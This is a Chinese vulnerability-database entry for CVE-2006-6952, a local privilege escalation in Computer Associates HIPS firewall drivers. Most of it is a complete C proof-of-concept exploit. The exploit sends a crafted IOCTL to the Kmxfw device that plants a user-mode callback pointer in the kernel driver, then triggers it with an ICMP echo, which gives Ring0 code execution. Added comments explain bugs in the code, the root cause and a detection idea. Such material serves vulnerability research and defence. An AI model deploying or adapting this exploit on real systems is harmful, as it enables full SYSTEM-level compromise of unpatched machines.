CA多个产品驱动本地权限提升漏洞

漏洞ID 1111568 漏洞类型 设计错误
发布时间 2006-11-16 更新时间 2007-01-25
CVE编号 CVE-2006-6952 CNNVD-ID CNNVD-200701-407
漏洞平台 Windows CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/29069
https://www.securityfocus.com/bid/21140
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-407
|漏洞详情
Computer Associates 是世界领先的安全厂商，产品包括多种杀毒软件及备份恢复系统。CA HIPS 产品的驱动在实现上存在问题，本地攻击者可能利用此漏洞提升权限。CA 的 HIPS Core (KmxStart.sys) 和 HIPS Firewall (KmxFw.sys) 驱动 hook 了 TDI 和 NDIS。本地非特权用户可以使用一些特权 IOCTL 覆盖这些驱动中的函数指针，以 Ring0 权限执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/21140/info

Multiple Computer Associates security-related products are prone to multiple local privilege-escalation vulnerabilities.

An attacker can leverage these issues to execute arbitrary code with SYSTEM-level privileges. This could result in the complete compromise of vulnerable computers.

These issues affect CA Personal Firewall 2007 (v9.0) Engine version 1.0.173 and prior and CA Internet Security Suite 2007 version 3.0 with CA Personal Firewall 2007 version 9.0 Engine version 1.0.173 and prior.

////////////////////////////////////
///// CA HIPS Engine Drivers
////////////////////////////////////
//// Kmxfw.sys
//// Kernel Privilege Escalation #2
//// Exploit
//// Rubén Santamarta
//// www.reversemode.com
//// 15/10/2006
//// ONLY FOR EDUCATION PURPOSES
//// NO MODIFICATION ALLOWED.
////////////////////////////////////
/////////////////////
/// Compiling:
/// gcc exploit.c -o exploit -lwsock32
/////////////////////


#include <windows.h>
#include <ntsecapi.h>
#include <iphlpapi.h>

#include <stdio.h>
#include <stdlib.h>
#include <string.h>


typedef HANDLE (WINAPI *PIcmpCreateFile)();
typedef DWORD (WINAPI *PIcmpSendEcho2)(   HANDLE IcmpHandle,
                                          HANDLE Event,
                                          FARPROC ApcRoutine,
                                          PVOID ApcContext,
                                          IPAddr DestinationAddress,
                                          LPVOID RequestData,
                                          WORD RequestSize,
                                          PIP_OPTION_INFORMATION RequestOptions,
                                          LPVOID ReplyBuffer,
                                          DWORD ReplySize,
                                          DWORD Timeout);

// Inert marker routine whose address main() places in the user-mode callback
// table handed to the driver. It does nothing but print a banner and park the
// calling thread for 50 seconds, so an observer can tell that the pointer the
// driver stored was actually followed. It is deliberately side-effect free
// beyond console output.
VOID Ring0Function()
{
 static const char *const banner[] = {
  "\n",
  "-----[RING0]------",
  "\n",
  "[*] Message: [.oO Hello From Ring0! Oo.]\n",
  "[!] Exploit Terminated\n",
  "-----[RING0]------",
 };
 size_t idx;

 // Each entry is emitted verbatim; none of them contains a conversion
 // specifier, so fputs prints exactly what printf did.
 for (idx = 0; idx < sizeof banner / sizeof banner[0]; idx++)
  fputs(banner[idx], stdout);

 // Keep the thread alive long enough for the banner to be read.
 Sleep(50000);
}

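// Report the most recent Win32 error in a message box and terminate the
// process with exit status 1. Called by main() when the device cannot be
// opened. Never returns.
//
// Fixes relative to the original: GetLastError() is captured before any other
// API can overwrite it; the explicit ANSI FormatMessageA is used so the buffer
// type matches MessageBoxA regardless of whether UNICODE is defined; a failed
// FormatMessage no longer dereferences an uninitialised pointer; the buffer
// allocated with FORMAT_MESSAGE_ALLOCATE_BUFFER is released with LocalFree.
VOID ShowError()
{
 DWORD dwErr = GetLastError();   // capture first: later calls may clobber it
 LPSTR lpMsgBuf = NULL;
 DWORD cch;

 cch = FormatMessageA(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
                      NULL,
                      dwErr,
                      MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
                      (LPSTR) &lpMsgBuf,
                      0,
                      NULL);

 if (cch == 0 || lpMsgBuf == NULL)
 {
  // FormatMessage itself failed: show the numeric code instead of whatever
  // happens to be in an unset buffer pointer.
  char szFallback[64];
  snprintf(szFallback, sizeof szFallback, "Unknown error 0x%08lx", (unsigned long) dwErr);
  MessageBoxA(0, szFallback, "Error", 0);
 }
 else
 {
  MessageBoxA(0, lpMsgBuf, "Error", 0);
  LocalFree(lpMsgBuf);   // ALLOCATE_BUFFER memory comes from LocalAlloc
 }

 exit(1);
}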

// Entry point of the proof of concept described in the advisory above.
//
// argv[1] selects which DLL exports the ICMP helpers ("2K" -> icmp.dll,
// anything else -> iphlpapi.dll). The program then opens the Kmxfw device,
// sends it one IOCTL whose buffer contains pointers to a user-mode callback
// table, and finally issues an ICMP echo so that network traffic passes
// through the driver. There is no return statement; under C99 falling off the
// end of main() yields exit status 0. The process never closes hDevice or
// frees OutBuff/ReplyBuffer; it relies on process teardown.
//
// Defender's note: the root cause (per the advisory text on this page) is a
// driver that accepts user-mode pointers through an IOCTL and later calls
// through them. Kernel code must treat every IOCTL buffer as untrusted input:
// validate sizes, probe user addresses under SEH, never store user-mode
// pointers in kernel-resident function tables, and restrict who can open the
// device object in the first place.
int main(int argc, char *argv[])
{

 // InBuff, InSize, i and dwRetVal are declared but never used.
 DWORD				*OutBuff,*InBuff;
 DWORD              CallBacks[4];			
 DWORD				dwIOCTL,OutSize,InSize,junk,i,dwRetVal;
 HANDLE				hDevice;
 PIcmpSendEcho2     IcmpSendEcho2;
 PIcmpCreateFile    IcmpCreateFile;
 LPVOID             ReplyBuffer;
 HANDLE             hIcmpFile;
 char               *SendData = "owned!";


  
 if(argc<2)
 {
  printf("\nusage> exploit.exe  2K or XP\n");
  exit(1);
 }

 // Neither LoadLibrary nor GetProcAddress is checked: if the DLL or export is
 // missing, the later calls through IcmpCreateFile/IcmpSendEcho2 are calls
 // through a NULL pointer.
 if(!strcmp(argv[1],"2K")) 
 {
  IcmpSendEcho2 = (PIcmpSendEcho2)GetProcAddress(LoadLibrary("icmp.dll")
													,"IcmpSendEcho2");
  IcmpCreateFile = (PIcmpCreateFile)GetProcAddress(LoadLibrary("icmp.dll")
                                                  ,"IcmpCreateFile");
 }                          
 else                        
{
  IcmpSendEcho2 = (PIcmpSendEcho2)GetProcAddress(LoadLibrary("iphlpapi.dll")
													,"IcmpSendEcho2");
  IcmpCreateFile = (PIcmpCreateFile)GetProcAddress(LoadLibrary("iphlpapi.dll")
                                                 ,"IcmpCreateFile");
}
 
// Spawns a command interpreter just to clear the console.
system("cls");
printf("############################\n");
printf("### CA Personal Firewall ###\n");
printf("##### - Ring0 Exploit - ####\n");
printf("############################\n");
printf("Ruben Santamarta\nwww.reversemode.com\n\n");
//////////////////////
///// CASE 'DosDevice'
//////////////////////

// Opens the driver's DOS device name with dwDesiredAccess = 0, no sharing and
// dwCreationDisposition = 3 (OPEN_EXISTING). That an unprivileged process can
// open it at all is part of the problem the advisory describes; a device
// object security descriptor that excludes non-administrators would stop the
// PoC at this line.
hDevice = CreateFile("\\\\.\\Kmxfw",
                     0,
                     0,
                     NULL,
                     3,
                     0,
                     0);

//////////////////////
///// INFO 
//////////////////////

 if (hDevice == INVALID_HANDLE_VALUE) ShowError();
 // %x with a HANDLE argument is a format/argument mismatch (HANDLE is a
 // pointer type); %p would be correct.
 printf("[!] Kmxfw Device Handle [%x]\n",hDevice);
 
//////////////////////
///// BUFFERS
//////////////////////
 // 0x44 bytes are allocated (unchecked malloc) but only the first three DWORDs
 // are ever written below; the remaining bytes go to the driver as
 // uninitialised heap contents.
 OutSize = 0x44;

 OutBuff = (DWORD *)malloc(OutSize);
 //////////////////////
 ///// IOCTL
 //////////////////////

 // Decoded per the CTL_CODE bit layout: device type 0x8500, function 5,
 // METHOD_BUFFERED, FILE_ANY_ACCESS (no particular access right required) --
 // confirm against the driver. A detection rule for this issue would key on
 // this control code being sent to \\.\Kmxfw from a non-elevated process.
 dwIOCTL = 0x85000014;
 // dwIOCTL is passed as an extra argument with no matching conversion
 // specifier; it is ignored by printf.
 printf("[!] Injecting Malicious Callback\n",dwIOCTL);
 // User-mode table whose second slot holds the address of Ring0Function.
 // CallBacks[3] is never initialised.
 CallBacks[0]=0;
 CallBacks[1]=(DWORD)Ring0Function;
 CallBacks[2]=0;
 
 // All three pointers the driver receives refer to the same user-mode table.
 // A correct driver would reject or probe these addresses rather than keep
 // them.
 OutBuff[0]=(DWORD)CallBacks;
 OutBuff[1]=(DWORD)CallBacks;
 OutBuff[2]=(DWORD)CallBacks;
 
 
 // The same buffer serves as input (0x10 bytes) and output (0x44 bytes). The
 // return value is not checked, so a driver that rejects the request is not
 // noticed; junk receives the bytes-returned count and is otherwise unused.
 DeviceIoControl(hDevice, 
                 dwIOCTL, 
                 (LPVOID)OutBuff,0x10,
                 (LPVOID)OutBuff,0x44,
                 &junk,  
                 NULL);
 
 // An outbound echo request generates the network activity the driver
 // filters (presumably via the TDI/NDIS hooks named in the advisory).
 // NOTE(review): sizeof(SendData) is the size of a char* (4 bytes on a 32-bit
 // build), not the length of "owned!", so both RequestSize and the reply
 // allocation are computed from the pointer size rather than the payload.
 printf("[!] Pinging google\n\t->Executing Ring0 Function\n");
 hIcmpFile=IcmpCreateFile();
 ReplyBuffer = (VOID*) malloc(sizeof(ICMP_ECHO_REPLY) + sizeof(SendData));
 IcmpSendEcho2(hIcmpFile,
                    NULL,
                    NULL,
                    NULL,
                    inet_addr("66.102.9.99"), 
                    SendData, 
                    sizeof(SendData),
                    NULL,
                    ReplyBuffer, 
                    8*sizeof(SendData) + sizeof(ICMP_ECHO_REPLY),
                    1000);

 
}
|受影响的产品
Computer Associates Personal Firewall 9.0; Computer Associates Internet Security Suite 2007 3.0; Computer Associates Internet Security Suite 2007 0
|参考资料

来源:BID
名称:21140
链接:http://www.securityfocus.com/bid/21140
来源:BUGTRAQ
名称:20061116 [Reversemode advisory] Computer Associates HIPS Drivers - multiple local privilege escalation vulnerabilities.
链接:http://www.securityfocus.com/archive/1/archive/1/451952/100/0/threaded
来源:BUGTRAQ
名称:20061121 RE: [Reversemode advisory] Computer Associates HIPS Drivers - multiple local privilege escalation vulnerabilities.
链接:http://www.securityfocus.com/archive/1/452286/100/0/threaded
来源:MISC
链接:http://www.reversemode.com/index.php?option=com_remository&Itemid=2&func=fileinfo&id=38
来源:SECUNIA
名称:22972
链接:http://secunia.com/advisories/22972
来源:www3.ca.com
链接:http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34818
来源:www3.ca.com
链接:http://www3.ca.com/securityadvisor/newsinfo/collateral.aspx?cid=97729
来源:BUGTRAQ
名称:20070124 [CAID 34818]: CA Personal Firewall Multiple Privilege Escalation Vulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/458040/100/200/threaded
来源:OSVDB
名称:30498
链接:http://www.osvdb.org/30498
来源:OSVDB